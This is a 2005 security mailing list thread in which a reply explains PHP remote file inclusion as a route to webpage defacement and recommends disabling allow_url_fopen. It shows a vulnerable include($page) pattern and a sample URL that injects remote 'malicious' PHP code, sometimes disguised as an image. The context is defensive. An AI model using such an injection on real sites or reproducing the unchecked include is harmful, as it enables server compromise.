Security Basics mailing list archives
Re: How webpage defacement possible just using web hacking?
From: Eduardo Kienetz <eduardok () gmail com>
Date: Wed, 9 Mar 2005 13:10:30 -0300
allow_url_fopen should be set to off in your php.ini That allows the possibility of exploiting PHP web applications that were not properly written. Example: http://www.blabla.com/t.php?page=/comments.php At the code we suppose: include($page); If url_fopen is allowed (and $page is not properly checked) I could just try: http://www.blabla.com/t.php?page=http://www.bbazdfq.com/maliciuscode.php Usually the extension is even of an image, but with php code in it. Regards, Eduardo Bacchi Kienetz LPI level 1 Certified On Wed, 09 Mar 2005 00:55:50 +0000, Monty Ree <chulmin2 () hotmail com> wrote:
Hello, all. Some days ago, a site is defacemented by web hacking. I guess that some attacker gained web server permission using web application vuln. and changed index file. Surely, the attacker did gain just nobody privilege(web server user) not root privilege and the index file permission is 644 with other user owned.(and there is no write permission at directory) I guess that it is impossible to change index file just nobody privilege. But most webpage defacement is occured using web application vuln. by php or cgi something like that. Of course, it will be possible that vulnerable cgi is set suid. but most is not. Any idea? Thanks in advance. _________________________________________________________________ 고.. 감.. 도.. 사.. 랑.. 만.. 들.. 기.. MSN 러브 http://www.msn.co.kr/love/
-- Eduardo Bacchi Kienetz http://www.noticiaslinux.com.br/eduardo/
Current thread:
- How webpage defacement possible just using web hacking? Monty Ree (Mar 08)
- Re: How webpage defacement possible just using web hacking? Eduardo Kienetz (Mar 09)
- Message not available
- Re: How webpage defacement possible just using web hacking? Eduardo Kienetz (Mar 10)
- Message not available
- Re: How webpage defacement possible just using web hacking? Eduardo Kienetz (Mar 09)
- <Possible follow-ups>
- RE: How webpage defacement possible just using web hacking? Hamish Stanaway (Mar 09)